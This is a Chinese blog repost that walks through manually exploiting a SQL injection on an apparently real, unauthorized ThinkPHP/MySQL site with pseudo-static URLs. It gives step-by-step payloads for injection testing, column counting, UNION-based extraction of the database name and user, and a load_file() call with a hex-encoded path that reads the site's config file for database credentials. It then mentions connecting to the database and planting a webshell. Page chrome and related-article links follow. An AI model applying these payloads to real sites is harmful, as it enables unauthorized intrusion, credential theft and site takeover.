记录一次伪静态注入

最新推荐文章于 2023-02-08 16:32:15 发布
最新推荐文章于 2023-02-08 16:32:15 发布
阅读量852 收藏 3
点赞数
文章标签: 数据库 后端 php
原文链接:http://www.cnblogs.com/pureqh/p/10911828.html
版权

记录一次伪静态注入 

 

0x01:前言

偶然得到一个站,顺便练习一下手注,记录一下过程

0x02:辨别伪静态

网站url结构:

是不是类似index.php?pid=2,感觉有猫腻的话就顺手试一下。

改变url为

发现未屏蔽报错,且暴露了部分信息

可以得出数据库为mysql,且网站框架为tp,基本可以确定是伪静态了,这就意味着/index/pid/2.html等同于/index?pid=2.

0x03:快乐手注

先fuzz一下有没有被waf的关键字,很快乐,一个都没被waf掉

开始注入:

1、payload:index?pid=2’and ‘1’ = ‘1,网页正常。

2、payload:index?pid=2’and ‘1’ = ‘2,网页报错。确定注入点存在且为字符型注入。

 

3、猜字段:payload: index?pid=2′)order by 1 — +,网页未报错。

payload: index?pid=2′)order by 2 — +,网页未报错。

payload: index?pid=2′)order by 3 — +,网页未报错。

payload: index?pid=2′)order by 4 — +,网页报错。

 

这里顺便说一下order by 的实质意义吧:order by 实际是猜查询出的列数,而不是表实际的列数。order by本来就是指定的结果如何order,针对的就是查询结果而不是原表。所以order by猜解得到的列数还跟在后端的逻辑有关。

详细可见 https://segmentfault.com/a/1190000002655427

4、查找可显示字段:

payload: index?pid=-2′)union select 1,2,3 — +。

 

5、查询当前数据库:

payload: index?pid=-2′)union select 1,database(),3 — +。

 

6、查询当前用户权限:

payload: index?pid=-2′)union select 1,user(),3 — +。

 

7、 利用报错得到的路径信息,结合ThinkPHP的目录结构,依次测试可能路径。发现配置文件在此路径下。

读文件/alidata/www/Application/Common/Conf/config.php成功得到了数据库的配置文件。

payload: index?pid=-2′)union select 1,load_file(0x2f616c69646174612f7777772f4170706c69636174696f6e2f436f6d6d6f6e2f436f6e662f636f6e6669672e706870),3 — +

 

8、远程连接数据库:

 

9、写个小马儿:

 

10、连接:

GG ······

0x03:先放着吧,过几天再搞,心累

转载于:https://www.cnblogs.com/pureqh/p/10911828.html

weixin_34411563
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
伪静态注入
afei001
06-25 1874
伪静态伪静态”顾名思义就是一种表面上看似是静态网页(以.html、.htm等结尾),不存在任何的数据交互,却其实是动态网页,存在数据交互的网站,具有这种特性的网页成为“伪静态网页”。我们看到的伪静态网页其实是经过处理的,将动态网页的id等参数通过URL重写来隐藏,让查看者以为是静态网页。 伪静态网站 如果看到一个以.html或者.htm结尾的网页,此时可以通过在地址输入框中输入:javascript:alert(document.lastMod...
在图片注入伪静态注入)习题情况下得到的知识集合
zezai3010的博客
12-13 2532
一、伪静态注入 (一)伪静态定义: 为了实时的显示一些信息。或者还想运用动态脚本解决一些问题。不能用静态的方式来展示网站内容。伪静态只是改变了URL的表现形式,实际上还是动态页面。 例:http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/ 和http://lab1.xseclab.com/sqli6_f37a4a60
36. 注入篇——伪静态注入
Fly_鹏程万里
03-08 8404
什么是伪静态伪静态”顾名思义就是一种表面上看似是静态网页(以.html、.htm等结尾),不存在任何的数据交互,却其实是动态网页,存在数据交互的网站,具有这种特性的网页成为“伪静态网页”。我们看到的伪静态网页其实是经过处理的,将动态网页的id等参数通过URL重写来隐藏,让查看者以为是静态网页。如何辨明伪静态网站如果看到一个以.html或者.htm结尾的网页,此时可以通过呢在在地址输入框中输入:j...
伪静态的sql注入
p_utao的博客
09-17 2652
伪静态是什么 伪静态是相对真实静态来讲的,通常我们为了增强搜索引擎的友好面,都将文章内容生成静态页面,但是有的朋友为了实时的显示一些信息。或者还想运用动态脚本解决一些问题。不能用静态的方式来展示网站内容。但是这就损失了对搜索引擎的友好面。怎么样在两者之间找个中间方法呢,这就产生了伪静态技术。伪静态技术是指展示出来的是以html一类的静态页面形式,但其实是用ASP一类的动态脚本来处理的。 伪静态验证 既然,我们了解什么是伪静态后,那么我们怎么判断一个网站是静态还是伪静态的呢? 首先我们可以根据网站最后的修
伪静态注入
Sud0day的博客
03-13 1570
伪静态网站注入方法,通常情况下,动态脚本的网站的url类似下面这样: http://www.91ri.org/news.php?id=111 做了伪静态之后就成这样了: http://www.91ri.org/news.php/id/111.html 以斜杠“/”代替了“=”并在最后加上.html,这样一来,就无法直接用工具来注入了。 常规的伪静态页面如下: http://www.XXX.com/...
伪静态注入方法讲解
weixin_30449239的博客
02-10 245
伪静态,主要是为了隐藏传递的参数名,伪静态只是一种URL重写的手段,既然能接受参数输入,所以并不能防止注入。目前来看,防止注入的最有效的方法就是使用LINQ。常规的伪静态页面如下:http://www.XXX.com/play/Diablo.html, 在看到之前先要确定这个页面是静态还是伪静态,鉴别方法很多。 例如关联的动态页面是game.php ,那么当用户访问后程序会自动转换成类似htt...
安鸾渗透实战平台(sql注入伪静态&搜索注入 (100分)
weixin_50985113的博客
02-08 450
安鸾渗透实战平台sqlmapbp。
PHPMPS分类信息 v2.3 GBK bulid20150128.rar
08-29
修复发布信息和企业的时候sql注入的bug。 修复可删除任意评论的bug。 修复可查看任何交易记录的bug。 修复备份数据可能暴力破解的bug。(请删除已经备份的数据,以防被下载) 漏洞威胁较大,建议尽快升级。
anyoucms-mysql.rar_sql injection_单点登录_可搜索加密
09-20
面向服务对象 主要针对企业,自助建站 简单,安全,个性化,人性化, ...单点登录(每次每个帐号只能登录一次,其他人重复登录将被提下线) 系统管理支持2种权限 超级管理和内容管理 内容管理(只能发表内容) 超级管理(所有权限)
安优企业建站系统 v4.0.rar
08-30
面向服务对象 主要针对企业,自助建站 简单,安全,个性化,人性化, ...单点登录(每次每个帐号只能登录一次,其他人重复登录将被提下线) 系统管理支持2种权限 超级管理和内容管理 内容管理(只能发表内容) 超级管理(所有权限)
安优企业建站系统 4.0 完结版
04-04
安优企业建站系统,主要针对企业,自助建站简单,安全,个性化,...单点登录(每次每个帐号只能登录一次,其他人重复登录将被提下线) 系统管理支持2种权限超级管理和内容管理内容管理(只能发表内容)超级管理(所有权限)
安优企业建站系统 v8.0
10-21
安优企业建站系统(anyoucms)面向服务对象主要针对 企业,...系统可以设置多点登录(只要帐号密码正确就可以登录)单点登录(每次每个帐号只能登录一次,其他人重复登录将被提下线)系统管理支持2种权限 超级管理和内容管理
常见SQL注入手法
weixin_57048716的博客
11-26 1582
1.联合查询 2.伪静态注入 3.宽字节注入 4.报错注入 5.基于布尔盲注 6.基于延时的盲注 7.堆叠注入 8.二次注入
sql注入之mysql数据库 sqlmap工具 伪静态注入 注入防御
weixin_46476861的博客
03-03 2831
python2和python3互不兼容,SqlMap是基于python2的,用2.7或之前的,所以SqlMap不支持python3 -u –level –risk -v 在包里参数进行测试语句 -m –mobile app通过抓包能得到url,但是不能在电脑地址栏里转到,所以需要模拟手机 -batch-smart 注入过程不需要在选择y或者n ctrl+c取消暴力破解 -r -p -threads 数据库外围命令
SQL注入之——伪静态注入
weixin_41657031的博客
07-15 2171
1.什么是伪静态注入? 答:“伪静态”顾名思义就是一种表面上看似是静态网页(以.html、.htm等结尾),不存在任何的数据交互,却其实是动态网页,存在数据交互的网站,具有这种特性的网页成为“伪静态网页”。我们看到的伪静态网页其实是经过处理的,将动态网页的id等参数通过URL重写来隐藏,让查看者以为是静态网页。展示出来的是以html一类的静态页面形式,但其实是用PHP一类的动态脚本来处理的。 2....
伪静态网站安全攻防如何理解
网站安全专家
04-08 3564
最近小伙伴问我说这个伪静态这个是怎么一回事,伪静态的这个网站的攻防要怎么做,那咱首先给大家先讲一讲伪静态是个什么东西。咱们一般网站都是分为静态和动态的,静态是什么,就比如说一些html页面组成的,就它是基本固定的,一般不会去变的那种内容动态,就是说根据你的不同请求来给你展示出不同的内容,那么对于seo,就是对于搜索引擎优化这些事来说,搜索引擎肯定是更喜欢静态网站的,所以精彩网站更容易做SEO提升我们的排名,那么有这种需求之后就出现了伪静态这么一个东西。 因为我们不可能做成真正静态,我们不可能一直.
渗透测试:sqlmap伪静态注入与携带cookie登录认证注入
热门推荐
foryouslgme的博客
10-10 2万+
sqlmap伪静态注入与携带cookie登录认证注入
伪静态sql注入sqlmap
最新发布
09-20
伪静态SQL注入是指在伪静态页面中通过注入恶意的SQL语句来获取或修改数据库中的信息。与真实的静态页面不同,伪静态页面是通过服务器脚本将动态内容转化为静态的HTML页面。在注入防御方面,PDO(PHP Data Object)...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值